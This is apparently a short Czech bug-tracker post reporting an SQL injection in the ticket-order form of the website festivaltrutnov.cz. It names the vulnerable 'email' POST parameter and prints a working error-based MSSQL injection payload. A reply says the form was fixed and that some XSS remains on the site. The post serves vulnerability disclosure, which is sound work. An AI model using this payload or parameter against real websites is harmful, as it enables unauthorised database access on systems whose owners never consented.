SQLi - festivaltrutnov.cz

BugTrack

SQLi - festivaltrutnov.cz#
SQLi rovnou na formuláři pro objednání vstupenek ..

[link]

Parameter Name: email
Parameter Type: Post
Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR
(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101
)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

vice chyb: [link]


(odpovědět)
Mrmla | 104.41.204.*12.5.2016 1:38
re: SQLi - festivaltrutnov.cz#
Na webu sice ještě nějaké XSS, ale jinak formulář opraven.
(odpovědět)
Mrmla | 185.97.214.*6.7.2016 16:42

Zpět
 
 
 

 
BBCode